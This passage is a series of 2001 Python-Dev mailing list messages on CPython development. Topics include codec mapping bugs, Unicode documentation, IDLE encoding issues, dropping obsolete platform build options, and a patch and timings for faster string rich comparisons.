2001 00:16:18 -0400 Subject: [Python-Dev] Ill-defined encoding for CP875? References: <02e501c0dade$ab7f1080$e46940d5@hagrid> Message-ID: <15103.23570.191115.85137@anthem.wooz.org> >>>>> "FL" == Fredrik Lundh writes: FL> (is Jython using exactly the same hashing and dictionary FL> algorithms as CPython? or does it work by accident also under FL> Jython?) Most likely, it's pure accident. Jython's PyDictionary uses a Java Hashtable underneath, so you're dependent on its behavior. -Barry From esr at thyrsus.com Mon May 14 07:20:17 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 01:20:17 -0400 Subject: [Python-Dev] State of curses tutorial? Message-ID: <20010514012017.A6971@thyrsus.com> A user pointed out a typo in the "Curses Programming with Python" tutorial at . While attempting to fix it, I discovered a few tings: 1. Somebody seems to have removed Andrew Kuchling's namne from it. If it was Andrew, that's OK -- but the reference in the latest version of the library docs still cites him. 2. I don't seem to have the TeX source anymore. Where can I download it? 3. Perhaps it's time to start putting howtos in the nondist part of the CVS tree? -- Eric S. Raymond Power concedes nothing without a demand. It never did, and it never will. Find out just what people will submit to, and you have found out the exact amount of injustice and wrong which will be imposed upon them; and these will continue until they are resisted with either words or blows, or with both. The limits of tyrants are prescribed by the endurance of those whom they oppress. -- Frederick Douglass, August 4, 1857 From greg at cosc.canterbury.ac.nz Mon May 14 07:36:49 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 14 May 2001 17:36:49 +1200 (NZST) Subject: [Python-Dev] Mac hierarchy backwards In-Reply-To: <20010511145640.9FCB5303181@snelboot.oratrix.nl> Message-ID: <200105140536.RAA18098@s454.cosc.canterbury.ac.nz> Jack Jansen : > MacOS (<= 9) itself doesn't have chdir, because it doesn't believe > in current directories (by design. Well, it does have an equivalent (HSetVol). But it's not used much by Mac software because it's usual to work with full file specifications at all times, at least internally. From martin at loewis.home.cs.tu-berlin.de Mon May 14 07:38:24 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 07:38:24 +0200 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT In-Reply-To: <3AFF2E8B.31B9ED97@FourThought.com> (message from Mike Olson on Sun, 13 May 2001 19:02:03 -0600) References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> <3AFF2E8B.31B9ED97@FourThought.com> Message-ID: <200105140538.f4E5cOb01301@mira.informatik.hu-berlin.de> > Should we standardize all of the python xml extensions with a py > prefix? pyReleaseNode or py_releaseNode? Then we will never have to > worry about a name clash. IMO, no. The entire interface together is the Python DOM mapping. In the unlikely event of a name clash, we could still decide to rename the DOM function, or find some other magic (e.g. overloading on the argument count). Regards, Martin From mal at lemburg.com Mon May 14 11:02:19 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 14 May 2001 11:02:19 +0200 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? References: Message-ID: <3AFF9F1B.A1CDD617@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > ... > > The "right" thing to do here, is to simply remove cp875 > > from the test for round-tripping. > > I'm relieved you think so, since that's what I already did . > > > It is not the only encoding which fails this test, but it's not > > our fault: the codecs were all generated from the original codec > > maps at the Unicode.org site. > > > > If their mappings are broken, we can't do much about it... other > > than to ignore the error or remove the codec altogether. > > On general principle I don't like either of those -- "in the face of > ambiguity, refuse the temptation to guess". It's at least surprising to see > > >>> unicode("?", "cp875").encode("cp875") > '\xfd' > >>> > > now, yes? Would it be better if an ambiguous encoding raised an exception in > "strict" mode? That is, a third choice is to alert users when they're > relying on a broken part of a mapping. The problem is: which part would raise the exception -- the encoder or the decoder ? Here are some more options: * sort the items before creating the encoding table from the decoding one (makes the mapping stable) * map keys which have multiple mappings in the encoding table to None -- this causes their usage to raise an exception (undefined mapping) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Mon May 14 11:15:43 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 14 May 2001 11:15:43 +0200 Subject: [Python-Dev] Unicode docs References: Message-ID: <3AFFA23F.248517E3@lemburg.com> Tim Peters wrote: > > [Mark Hammond] > > ... > > Where should the "real" documentation go? It seems maybe we need a > > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something > > like: > > > > 6.1.x - Unicode and the file system > > - general discussion. > > - Windows specific > > - Mac specific should that appear. > > - OS' with no special support (ie, "the rest") > > > > Does that make sense? > > So far is it goes, yes. I think the manual desperately needs a Unicode > section for other reasons, though: from traffic on c.l.py, it's clear that > few people can figure out how to do *anything* with Unicode now unless their > first name begins with "M" (Mark, Martin, Marc -- definitely not Skip > ). There's no overview and there are no examples. The primary string > method doesn't even mention Unicode (here paraphrasing questions that pop > up): > [...] True. The main source of documentation for Unicode still is the proposal itself (Misc/unicode.txt). It needs some reordering and a few examples, but does contain all the information needed to grasp what the implementation intends and how it works. If that's still not enough, there are numerous doc-strings in the codecs.py module, more technical docs in the API reference and finally the unicodeobject.h header file itself. Another source for documentation and examples is the i18n-sig page on python.org. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jack at oratrix.nl Mon May 14 11:55:26 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 14 May 2001 11:55:26 +0200 Subject: [Python-Dev] Py_FileSystemDefaultEncoding Message-ID: <20010514095527.009E8303181@snelboot.oratrix.nl> I'm not too thrilled with the way the filename encoding stuff was done, with a global var declared in posixmodule.c which is then used by bltinmodule.c. It took me quite a while to figure out why my builds were failing, and how to fix it. And I think other minority platforms may have the same problem, so maybe it's a good idea to move the Py_FileSystemDefaultEncoding declaration to an include file, and do the initialization in a more "common" place? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From fredrik at pythonware.com Mon May 14 12:18:49 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Mon, 14 May 2001 12:18:49 +0200 Subject: [Python-Dev] State of curses tutorial? References: <20010514012017.A6971@thyrsus.com> Message-ID: <007f01c0dc5f$459d3b70$0900a8c0@spiff> eric wrote: > > 1. Somebody seems to have removed Andrew Kuchling's namne from it. If it > was Andrew, that's OK -- but the reference in the latest version of the > library docs still cites him. that would be either you (who reworked the document), or andrew (who checked in your changes). looks like fred has already fixed it: Revision 1.13, Tue Apr 10 17:35:31 2001 UTC (4 weeks, 5 days ago) by fdrake Use appropriate markup for multiple authors; LaTeX's \author is not additive; the second occurrance was causing the first author to be dropped. > 2. I don't seem to have the TeX source anymore. Where can I download it? it's in the py-howto CVS tree: http://sourceforge.net/projects/py-howto Cheers /F From loewis at informatik.hu-berlin.de Mon May 14 13:29:21 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 14 May 2001 13:29:21 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <3AFEC72A.33076220@lemburg.com> (mal@lemburg.com) References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <3AFEC72A.33076220@lemburg.com> Message-ID: <200105141129.NAA22305@pandora.informatik.hu-berlin.de> > I have a bug report assigned to myself which indicates similar > problems with _tkinter and Tk/Tcl. There were other problem > reports on the German Python mailing list going in the same > direction too. > > The basic problem seems to be that Tk/Tcl applies too much > magic to the text widget contents in order to find out the > used encoding and this can easily cause the whole encoding > mechanism to fail. This is actually a different problem. In this scenario here, the user types non-ASCII character into a text widget, then _tkinter returns a Unicode object (IMO rightfully so). In the other problem, the Python program puts a byte string into a text widget, the user enters some more characters, and _tkinter returns a byte string which does not follow any encoding. > A Tk/Tcl expert should really look into this and fix _tkinter.c > to aid Tk/Tcl in not mixing up the encodings (e.g. it would > probably be a good idea to recode Python 8bit-strings into > whatever encoding Tk/Tcl assumes as default). Again, this is not the issue here: Both _tkinter and Tk behave absolutely correct IMO. The question is how IDLE should deal with it. Regards, Martin From loewis at informatik.hu-berlin.de Mon May 14 13:41:26 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 14 May 2001 13:41:26 +0200 (MEST) Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> (message from Guido van Rossum on Sun, 13 May 2001 17:51:17 -0500) References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <200105132251.RAA21344@cj20424-a.reston1.va.home.com> Message-ID: <200105141141.NAA22376@pandora.informatik.hu-berlin.de> > Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the > Python prompt, both on Linux and on Windows 98. It prints as > '\xe4\xf6' on both systems. What changed? Perhaps the Tcl version? That sounds like the issue that Marc talked about: Tk behaves differently when text is entered programmatically (and perhaps through cut-n-paste), as compared to text entered through the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on Solaris 8 still gives me the UnicodeError. Regards, Martin From MarkH at ActiveState.com Mon May 14 14:20:43 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Mon, 14 May 2001 22:20:43 +1000 Subject: [Python-Dev] Py_FileSystemDefaultEncoding In-Reply-To: <20010514095527.009E8303181@snelboot.oratrix.nl> Message-ID: > I'm not too thrilled with the way the filename encoding stuff was > done, with a My apologies. I did try and publicise the patch as much as possible. A misguided attempt at a low-impact change :( I have checked in the changes you suggest. Mark. From barry at digicool.com Mon May 14 14:54:59 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Mon, 14 May 2001 08:54:59 -0400 Subject: [Python-Dev] Unicode docs References: <3AFFA23F.248517E3@lemburg.com> Message-ID: <15103.54691.560967.853132@anthem.wooz.org> >>>>> "M" == M writes: M> True. The main source of documentation for Unicode still is the M> proposal itself (Misc/unicode.txt). It needs some reordering M> and a few examples, but does contain all the information needed M> to grasp what the implementation intends and how it works. As a first step, why not PEP-ify that document, much like as has been done with the DB-API (version 1 & 2)? It can be an informational PEP. -Barry From esr at thyrsus.com Mon May 14 17:11:57 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Mon, 14 May 2001 11:11:57 -0400 Subject: [Python-Dev] State of curses tutorial? In-Reply-To: <007f01c0dc5f$459d3b70$0900a8c0@spiff>; from fredrik@pythonware.com on Mon, May 14, 2001 at 12:18:49PM +0200 References: <20010514012017.A6971@thyrsus.com> <007f01c0dc5f$459d3b70$0900a8c0@spiff> Message-ID: <20010514111157.C10920@thyrsus.com> Fredrik Lundh : > it's in the py-howto CVS tree: > > http://sourceforge.net/projects/py-howto What module is the Python-HOWTO in? -- Eric S. Raymond "The best we can hope for concerning the people at large is that they be properly armed." -- Alexander Hamilton, The Federalist Papers at 184-188 From skip at pobox.com Mon May 14 17:54:54 2001 From: skip at pobox.com (skip at pobox.com) Date: Mon, 14 May 2001 10:54:54 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> Message-ID: <15103.65486.61021.328424@beluga.mojam.com> Martin> That *should* work, except that it also has its 'methods' field Martin> where tp_traverse would go, and its class_flags field where Martin> tp_clear would go. Okay, so I'm completed confused now. I extended the definition of ECTypeType to include this after the doc string slot: (traverseproc)0, /* tp_traverse */ (inquiry)0, /* tp_clear */ (richcmpfunc)0, /* rich comparisons */ 0L, /* weak reference enabler */ #ifdef COUNT_ALLOCS /* these must be last */ 0, /* tp_alloc */ 0, /* tp_free */ 0, /* tp_maxalloc */ (struct _typeobject *)0, /* tp_next */ #endif When I looked at the definition of ECType, after the doc string I saw METHOD_CHAIN(ExtensionClass_methods) as Martin indicated. I can't simply insert the same zeroes at the end of the ECType def'n as I did at the end of the ECTypeType definition. Where does this METHOD_CHAIN thing go? I looked at the def'n of struct _typeobject in Include/object.h but didn't see a slot that looked suitable. FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested, I get Fatal Python error: UNREF invalid object when I run my failing script. This is with and without making any changes to ECType or ECTypeType. Skip From sdm7g at Virginia.EDU Mon May 14 19:04:56 2001 From: sdm7g at Virginia.EDU (Steven D. Majewski) Date: Mon, 14 May 2001 13:04:56 -0400 (EDT) Subject: [Python-Dev] deprecated platforms Message-ID: Jack asked me about: https://sourceforge.net/tracker/?func=detail&aid=420601&group_id=5470&atid=105470 which concerns removing the support for --with-next-framework from the build procedure. I'm all for removing it: it's broken for OSX, if it worked, it doesn't do the whole job ( I think framework support should eventually be added for OSX with a separate post-build script -- a real framework should encapsulate all of the python libs, docs and headers files in one bundle. ) nobody seems to know if it still works on Next or OpenStep. However, I said I thought there ought to be some sort of official procedure for removing platform support. This doesn't seem to be addressed in either PEP 4 (Deprecation of Standard Modules) or PEP 5 (Guidelines for Language Evolution). I don't think it needs to be as involved a process as PEP 4 or 5 -- it's a more reversable decision than removing a feature from the language. Although, removing a platform dependent feature -- like in the long discussion about case sensitivity -- may be a bigger deal. But I'm really thinking more about things like the Next case -- where there are build options and #ifdefs that, as far as we know, haven't been tested in several versions. ( Believe it or not, there are still folks hanging dearly onto their black NeXT cubes, and finding the useful -- but I have no idea if any of them are using Python, and there's lots of users out there whom we only hear from when they discover a problem. ) Perhaps there should be some sort of "Last Call for Platform Saviour" : if nobody steps forward who is willing to do test builds on that platform, support may be removed if maintaining it is getting in the way. Any thougts or opinions on this? Are there any other platforms where this might become an issue ? If this looks like it's unlikely to crop up again, then maybe we don't need to bother with a 'policy'. What about support for particular compilers and build environments: (Borland C on Windows and MPW on Mac are two examples of "minority" compilers.) BTW: As I've though more about this particular issue (--with-next-framework) I don't think it's as big an issue -- removing that switch isn't going to break the build entirely (I think!). Pulling out all of the #ifdefs for Next would be a larger issue, but that hasn't been proposed (yet). If the consensus is that this isn't a big enough issue, in general, to need an official policy, then I vote to pull it out and see if anyone screams. -- Steve Majewski From guido at digicool.com Mon May 14 22:53:26 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 14 May 2001 15:53:26 -0500 Subject: [Python-Dev] deprecated platforms In-Reply-To: Your message of "Mon, 14 May 2001 13:04:56 -0400." References: Message-ID: <200105142053.PAA24202@cj20424-a.reston1.va.home.com> I can't really add much to this discussion, since I have *absolutely* *no* *idea* what kind of framework we're talking about here... I agree with Steve that we shouldn't be too scared of removing support for obsolete platforms. People hanging on to obsolete platforms may as well hang on to obsolete Python versions... --Guido van Rossum (home page: http://www.python.org/~guido/) From martin at loewis.home.cs.tu-berlin.de Mon May 14 21:40:21 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 21:40:21 +0200 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <15103.65486.61021.328424@beluga.mojam.com> (skip@pobox.com) References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> Message-ID: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> > Okay, so I'm completed confused now. I extended the definition of > ECTypeType to include this after the doc string slot: > > (traverseproc)0, /* tp_traverse */ > (inquiry)0, /* tp_clear */ > (richcmpfunc)0, /* rich comparisons */ > 0L, /* weak reference enabler */ > > #ifdef COUNT_ALLOCS > /* these must be last */ > 0, /* tp_alloc */ > 0, /* tp_free */ > 0, /* tp_maxalloc */ > (struct _typeobject *)0, /* tp_next */ > #endif Why did you do that? ECTypeType has the right data type (PyTypeObject). It is the instances of PyExtensionClass that are troubling > When I looked at the definition of ECType, after the doc string I saw > > METHOD_CHAIN(ExtensionClass_methods) > > as Martin indicated. I can't simply insert the same zeroes at the end of > the ECType def'n as I did at the end of the ECTypeType definition. Of course not. ECType is of type PyExtensionClass, not of type PyTypeObject. Those are similar, but not equal. > Where does this METHOD_CHAIN thing go? I looked at the def'n of > struct _typeobject in Include/object.h but didn't see a slot that > looked suitable. Just have a look at ExtensionClass.h instead. > FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested, > I get > > Fatal Python error: UNREF invalid object > > when I run my failing script. This is with and without making any changes > to ECType or ECTypeType. BTW, what version of PyGtk did you try to compile? I've tried the 0.7.0-dont-use, and it can run examples/testgtk without major problems (the example did need some updates, since it is apparently outdated). My Gtk version was 1.2, on Linux. In any case, I think you need to analyse this in a debugger. Regards, Martin From tim at digicool.com Mon May 14 22:12:44 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 14 May 2001 16:12:44 -0400 Subject: [Python-Dev] Comparison speed Message-ID: Here's a simple test program: from time import clock indices = [1] * 100000 def doit(): s = clock() i = 0 while i < 100000: "ab" < "cd" i += 1 f = clock() return f - s for i in xrange(10): print "%.3f" % doit() And here's output from 2.0, 2.1 and current CVS: C:\Code\python\dist\src\PCbuild>\python20\python timech.py 0.107 0.106 0.109 0.106 0.106 0.106 0.106 0.106 0.105 0.106 C:\Code\python\dist\src\PCbuild>\python21\python timech.py 0.118 0.118 0.117 0.118 0.117 0.118 0.117 0.118 0.117 0.118 C:\Code\python\dist\src\PCbuild>python timech.py 0.119 0.117 0.118 0.117 0.118 0.117 0.118 0.117 0.118 So "something happened" between 2.0 and 2.1 to slow this overall by 10%. string_compare hasn't changed, so rich comparisons are a good guess. Note that the more obvious timing loop obscures the issue: def doit(): s = clock() for i in indices: "ab" < "cd" f = clock() return f - s C:\Code\python\dist\src\PCbuild>\python20\python timech.py 0.070 0.069 0.069 0.070 0.069 0.069 0.069 0.070 0.069 0.069 C:\Code\python\dist\src\PCbuild>\python21\python timech.py 0.076 0.076 0.076 0.076 0.076 0.077 0.076 0.076 0.076 0.076 C:\Code\python\dist\src\PCbuild>python timech.py 0.069 0.070 0.070 0.069 0.069 0.070 0.070 0.069 0.070 0.069 for-loops are faster in current CVS than in 2.0 or 2.1, and that cancels out the comparison slowdown. If we try it with a type of comparison that avoids the richcmp machinery (int < int is special-cased in ceval), current CVS is actually faster than 2.0: def doit(): s = clock() for i in indices: 2 < 3 f = clock() return f - s C:\Code\python\dist\src\PCbuild>\python20\python timech.py 0.056 0.056 0.056 0.056 0.055 0.056 0.058 0.058 0.055 0.056 C:\Code\python\dist\src\PCbuild>\python21\python timech.py 0.059 0.059 0.059 0.060 0.060 0.059 0.059 0.060 0.059 0.059 C:\Code\python\dist\src\PCbuild>python timech.py 0.053 0.052 0.052 0.053 0.053 0.052 0.052 0.054 0.052 0.053 C:\Code\python\dist\src\PCbuild> This also shows that 2.1 was a bit more slothful than 2.0 for some reason other than richcmps. These were all done on a Win2K box; timings vary too much on a Win9x box to be useful. Anybody care to take a stab at making the new richcmp and/or coerce code ugly again? speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim From martin at loewis.home.cs.tu-berlin.de Mon May 14 22:34:35 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 22:34:35 +0200 Subject: [Python-Dev] deprecated platforms Message-ID: <200105142034.f4EKYZs05805@mira.informatik.hu-berlin.de> > I'm all for removing it: So am I. There are way too many build options for build Python on the Mac-like systems already (e.g. after that change, you still have --with-dyld - or rather the option of still building .o extensions). If it is clearly broken (even if only on OSX), it should be removed. Anybody interested in the flag would need to make it work correctly before it can be revived. > However, I said I thought there ought to be some sort of official > procedure for removing platform support. I don't think such a procedure is necessary. It is not that any end user would be concerned; building Python is an activity of system administrators. The other PEPs are there because changing the language or removing modules might break *applications* that used to work after an upgrade of Python. With removed platform support, nothing will break - installations would continue to use the last release that did support that platform. Regards, Martin From martin at loewis.home.cs.tu-berlin.de Tue May 15 00:06:57 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Tue, 15 May 2001 00:06:57 +0200 Subject: [Python-Dev] Comparison speed Message-ID: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> > Anybody care to take a stab at making the new richcmp and/or coerce > code ugly again? When stepping through the code, I also missed support for the relationship between identity and equality. E.g. in PyObject_RichCompare, I'd expect if (v == w) { switch (op) case Py_EQ:case Py_LE:case Py_GE: Py_INCREF(Py_True); return Py_True; case Py_NE:case Py_LT:case Py_GT: Py_INCREF(Py_False); return Py_False; } } That would not help in your case, of course. I don't even know how frequent comparing identical objects is in real life - but this is something that PyObject_Compare has that PyObject_RichCompare currently doesn't. Regards, Martin From martin at loewis.home.cs.tu-berlin.de Mon May 14 23:55:39 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 14 May 2001 23:55:39 +0200 Subject: [Python-Dev] Comparison speed Message-ID: <200105142155.f4ELtdM09420@mira.informatik.hu-berlin.de> > Anybody care to take a stab at making the new richcmp and/or coerce > code ugly again? Hi Tim, With CVS Python, 1000000 iterations, and a for loop, I currently got 0.780 0.770 0.770 0.780 0.770 0.770 0.770 0.780 0.770 0.770 With the patch below, I get 0.720 0.710 0.710 0.720 0.710 0.710 0.710 0.720 0.710 0.710 The idea is to let strings support richcmp; this also allows some optimization for the EQ case. Please let me know what you think. Martin Index: stringobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/stringobject.c,v retrieving revision 2.115 diff -u -r2.115 stringobject.c --- stringobject.c 2001/05/10 00:32:57 2.115 +++ stringobject.c 2001/05/14 21:36:36 @@ -596,6 +596,51 @@ return (len_a < len_b) ? -1 : (len_a > len_b) ? 1 : 0; } +/* In the signature, only a is guaranteed to be a PyStringObject. + However, as the first thing in the function, we check that b + is of that type also. */ + +static PyObject* +string_richcompare(PyStringObject *a, PyStringObject *b, int op) +{ + int c; + PyObject *result; + if (!PyString_Check(b)) { + result = Py_NotImplemented; + goto out; + } + if (op == Py_EQ) { + if (a->ob_size != b->ob_size) { + result = Py_False; + goto out; + } +#ifdef CACHE_HASH + if (a->ob_shash != b->ob_shash + && a->ob_shash != -1 + && b->ob_shash != -1) { + result = Py_False; + goto out; + } +#endif + } + c = string_compare(a, b); + switch (op) { + case Py_LT: c = c < 0; break; + case Py_LE: c = c <= 0; break; + case Py_EQ: c = c == 0; break; + case Py_NE: c = c != 0; break; + case Py_GT: c = c > 0; break; + case Py_GE: c = c >= 0; break; + default: + result = Py_NotImplemented; + goto out; + } + result = c ? Py_True : Py_False; + out: + Py_INCREF(result); + return result; +} + static long string_hash(PyStringObject *a) { @@ -2409,6 +2454,12 @@ &string_as_buffer, /*tp_as_buffer*/ Py_TPFLAGS_DEFAULT, /*tp_flags*/ 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + (richcmpfunc)string_richcompare, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ }; void From gstein at lyra.org Tue May 15 00:17:56 2001 From: gstein at lyra.org (Greg Stein) Date: Mon, 14 May 2001 15:17:56 -0700 Subject: [Python-Dev] Comparison speed In-Reply-To: ; from tim@digicool.com on Mon, May 14, 2001 at 04:12:44PM -0400 References: Message-ID: <20010514151755.P1374@lyra.org> On Mon, May 14, 2001 at 04:12:44PM -0400, Tim Peters wrote: >... > Anybody care to take a stab at making the new richcmp and/or coerce code > ugly again? > > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim Euh... isn't Guido's preference for cleanliness over speed? Cheers, -g -- Greg Stein, http://www.lyra.org/ From tim at digicool.com Tue May 15 00:35:33 2001 From: tim at digicool.com (Tim Peters) Date: Mon, 14 May 2001 18:35:33 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <20010514151755.P1374@lyra.org> Message-ID: [Greg Stein] > Euh... isn't Guido's preference for cleanliness over speed? So do both. From greg at cosc.canterbury.ac.nz Tue May 15 03:42:49 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Tue, 15 May 2001 13:42:49 +1200 (NZST) Subject: [Python-Dev] Comparison speed In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> Message-ID: <200105150142.NAA18195@s454.cosc.canterbury.ac.nz> "Martin v. Loewis" : > I also missed support for the > relationship between identity and equality. That would severely restrict the semantics that could be given to the comparison operators by overloading them. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From guido at digicool.com Tue May 15 04:40:33 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 14 May 2001 21:40:33 -0500 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Mon, 14 May 2001 15:17:56 MST." <20010514151755.P1374@lyra.org> References: <20010514151755.P1374@lyra.org> Message-ID: <200105150240.VAA26417@cj20424-a.reston1.va.home.com> > > speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs - tim > > Euh... isn't Guido's preference for cleanliness over speed? Yeah, Tim & I have developed a nice good-cop-bad-cop routine about this. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one at home.com Tue May 15 05:36:42 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 14 May 2001 23:36:42 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > When stepping through the code, I also missed support for the > relationship between identity and equality. E.g. in > PyObject_RichCompare, I'd expect > > if (v == w) { > switch (op) > case Py_EQ:case Py_LE:case Py_GE: > Py_INCREF(Py_True); > return Py_True; > case Py_NE:case Py_LT:case Py_GT: > Py_INCREF(Py_False); > return Py_False; > } > } > > That would not help in your case, of course. I don't even know how > frequent comparing identical objects is in real life - but this is > something that PyObject_Compare has that PyObject_RichCompare > currently doesn't. Guido insisted (with cause ) on these four pairs as being equivalent: x < y iff y > x x <= y y >= x x == y y == x x != y y != x but beyond that, in the presence of rich comparisons, agreed not to make any other assumptions about what those pixel-bags "mean". In particular, there's no implication that "x <= y" iff "x < y or x == y", or that "x < y" implies "x != y", etc. Applying that to the above leaves you with nothing but if (v == w && op == Py_EQ) /* then return Py_True */ Which is about all PyObject_Compare's if (v == w) return 0; assumes too. So I don't see much future in that. [later, a patch to fill in the richcmp slot for strings] > +static PyObject* > +string_richcompare(PyStringObject *a, PyStringObject *b, int op) > +{ > + int c; > + PyObject *result; > + if (!PyString_Check(b)) { > + result = Py_NotImplemented; > + goto out; > + } > + if (op == Py_EQ) { > + if (a->ob_size != b->ob_size) { > + result = Py_False; > + goto out; > + } > +#ifdef CACHE_HASH > + if (a->ob_shash != b->ob_shash > + && a->ob_shash != -1 > + && b->ob_shash != -1) { > + result = Py_False; > + goto out; > + } > +#endif > + } > + c = string_compare(a, b); > + switch (op) { > + case Py_LT: c = c < 0; break; > + case Py_LE: c = c <= 0; break; > + case Py_EQ: c = c == 0; break; > + case Py_NE: c = c != 0; break; > + case Py_GT: c = c > 0; break; > + case Py_GE: c = c >= 0; break; > + default: > + result = Py_NotImplemented; > + goto out; > + } > + result = c ? Py_True : Py_False; > + out: > + Py_INCREF(result); > + return result; [and that yields about an 8% speedup in the "<" case] That looks on the right track, but maybe at the wrong level: why is it necessary? That is, the bulk of the "smarts" here in the switch stmt are type-independent: if there's no specific implementation of individual comparisons, but there is a tp_compare, then the switch stmt applies verbatim to *any* such type. Do we have to fill in the richcmp slot for everything to get Python to realize that? I mean "just about everything", too: while, e.g., ceval special-cases "<" for ints, that doesn't do sorting or max or min etc on ints a lick of good (they don't go thru the COMPARE_OP opcode then, but thru the general comparison routines). The "speed problem" appears to be: + COMPARE_OP calls cmp_outcome() + which calls PyObject_RichCompare() + which calls do_richcmp() + which calls try_rich_compare() (unsuccessfully now, successfully after your patch) which fails to find a richcmp slot on either operand (now) so says "not implemented" + then calls try_3way_to_rich_compare() + which calls try_3way_compare() + which finally calls the tp_compare slot + then runs exactly the same switch (op) { case Py_LT: c = c < 0; break; case Py_LE: c = c <= 0; break; case Py_EQ: c = c == 0; break; case Py_NE: c = c != 0; break; case Py_GT: c = c > 0; break; case Py_GE: c = c >= 0; break; } result = c ? Py_True : Py_False; switch as your patch and things unwind. So we've got 7 function calls there, not even counting calls to PyErr_Occurred() and PyObject_IsTrue(), all to find about 3 machine instructions that actually do the compare . You got an 8% speedup for one type by tricking the switch stmt into appearing 3 calls earlier. What if the implementation were smarter, and did it for *all* relevant types even a call or two before that? I don't see any reason "in principle" that compares couldn't be much faster, and via the usual gimmicks: bigger, smarter functions that remember what they've already determined so don't need to figure it out over and over again, and fast paths to favor common cases at the expense of comparisons from Mars. One thing to note here: the workhorse comparisons are "like strings" in having no *logical* need for richcmps at all; and the objects for which richcmps were introduced were numerical arrays, which can much better afford a longer code path to *find* them (one matrix compare will trigger many vanilla element compares anyway, so even for arrays it's much more important that the *latter* be fast). The code now is approximately backwards in that respect (it takes gobs of work before we even *look* for a cmp now -- indeed, if a type has both cmp and richcmp slots now, and we're doing an explict "cmp" compare, the code now tries to *simulate* cmp first via a long sequence of richcmp calls!). I don't have time to uglify this code, but Python would benefit from it. and-no-matter-what-guido-may-say-ly y'rs - tim From tim.one at home.com Tue May 15 05:50:00 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 14 May 2001 23:50:00 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules spam.c,1.1.2.3,1.1.2.4 In-Reply-To: Message-ID: [Guido] > Index: spam.c > ... Congratulations! "My other" ISP (MSN) just started 